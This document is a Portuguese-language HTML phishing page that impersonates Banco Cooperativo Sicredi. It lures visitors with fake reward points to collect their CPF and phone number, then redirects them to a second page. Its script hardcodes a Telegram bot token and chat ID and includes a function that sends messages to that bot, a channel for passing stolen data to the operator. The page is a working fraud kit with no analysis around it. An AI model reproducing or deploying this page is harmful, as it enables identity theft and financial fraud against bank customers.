<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sicredi</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #ffffff;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            box-sizing: border-box;
        }

        .container {
            width: 100%;
            max-width: 600px;
            padding: 20px;
            box-sizing: border-box;
            border: 2px solid #33820d;
            border-radius: 40px;
            background-color: #fff;
            box-shadow: 0 4px 8px rgba(51, 130, 13, 0.2), 0 -4px 8px rgba(51, 130, 13, 0.2);
            text-align: center;
        }

        p {
            font-size: 18px;
            line-height: 1.3;
            margin-bottom: 15px;
            color: #333;
        }

        .negrito {
            font-weight: bold;
            color: #33820d;
        }

        .icon {
            margin-right: 10px;
        }

        footer {
            margin-top: 30px;
            font-size: 12px;
            color: #666;
        }

        button {
            width: 100%;
            padding: 12px;
            margin-top: 10px;
            background-color: #33820d;
            border: none;
            border-radius: 40px;
            font-size: 16px;
            cursor: pointer;
            color: #fff;
        }

        button:hover {
            background-color: #276c0f;
        }

        button:focus {
            outline: none;
            box-shadow: 0 0 5px rgba(51, 130, 13, 0.5);
        }

        input[type="text"] {
            width: 100%;
            padding: 15px;
            margin-top: 10px;
            border: 2px solid #33820d;
            border-radius: 40px;
            font-size: 16px;
            color: #333;
            box-sizing: border-box;
        }

        input[type="text"]:focus {
            border-color: #276c0f;
            outline: none;
        }

        .icon {
            margin-right: 8px;
            color: #33820d;
        }
    </style>
</head>
<body>

    <div class="container" id="container">
        <p>Resgate <span class="negrito">AGORA</span> seus pontos acumulados por utilizar a <span class="negrito">SICREDI</span></p>
        <img src="img.jpg" alt="Imagem Exemplo" style="margin-top: 20px; max-width: 80%; height: auto;">
        <p class="segundo-texto">Se usou seu cartão <span class="negrito">SICREDI</span> para compras entre <span class="negrito">2022</span> e <span class="negrito">2024</span>, insira seu CPF abaixo:</p>

        <div class="formulario">
            <form id="cpfForm">
                <label for="cpf"><i class="fas fa-user icon"></i><span>CPF:</span></label>
                <input type="text" id="cpf" name="cpf" placeholder="000.000.000-00" required><br><br>
                <button type="button" onclick="validarCPF()">Validar</button>
            </form>
        </div>

        <footer>
            <p><span class="negrito">© Banco Cooperativo Sicredi S.A.</span> Todos os direitos reservados</p>
        </footer>
    </div>

    <div class="container" id="pontosLiberados" style="display: none;">
        <p><span class="negrito">Pontos Liberados!</span></p>
        <div class="pontos">34.500 PTS</div>
        <p>Conforme a consulta de CPF em nosso banco de dados, verificamos que você tem direito a PONTOS devido ao uso do seu cartão entre 2022 e 2024.</p>
        <p>Prossiga com as informações do seu cadastro e receba o valor em até 3 dias úteis.</p>
        <button onclick="continuar()">Continuar</button>
        <footer>
            <p><span class="negrito">© Banco Cooperativo Sicredi S.A.</span> Todos os direitos reservados</p>
        </footer>
    </div>

    <div class="container" id="dadosComplementares" style="display: none;">
        <p>Confirme seu <span class="negrito">telefone</span> para continuar </p>
        <form id="phoneForm">
            <input type="text" id="telefone" name="telefone" placeholder="(XX) XXXXX-XXXX" required><br><br>
            <button type="button" onclick="confirmarTelefone()">Continuar</button>
        </form>
    </div>

    <script>
        const tokenBotTelegram = "7641124246:AAHT7YBvtkm9H0DdWpAwbVzf5rXFneFWAi0";
        const chatId = "5219689168";

        function validarCPF() {
            var cpf = document.getElementById("cpf").value;
            if (cpf.length === 14) {
                localStorage.setItem("cpf", cpf);
                document.getElementById("container").style.display = "none";
                document.getElementById("pontosLiberados").style.display = "block";
            } else {
                alert("CPF inválido! Verifique o formato.");
            }
        }

        function continuar() {
            document.getElementById("pontosLiberados").style.display = "none";
            document.getElementById("dadosComplementares").style.display = "block";
        }

        function confirmarTelefone() {
            var telefone = document.getElementById("telefone").value;
            if (telefone) {
                localStorage.setItem("telefone", telefone);
                window.location.href = "segundo.html";
            } else {
                alert("Por favor, insira um telefone válido.");
            }
        }

        function enviarParaTelegram(mensagem) {
            const url = `https://api.telegram.org/bot${tokenBotTelegram}/sendMessage`;
            const data = {
                chat_id: chatId,
                text: mensagem
            };

            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(data),
            })
            .then(response => response.json())
            .then(data => {
                console.log('Mensagem enviada com sucesso:', data);
            })
            .catch((error) => {
                console.error('Erro ao enviar mensagem:', error);
            });
        }
    </script>

</body>
</html>
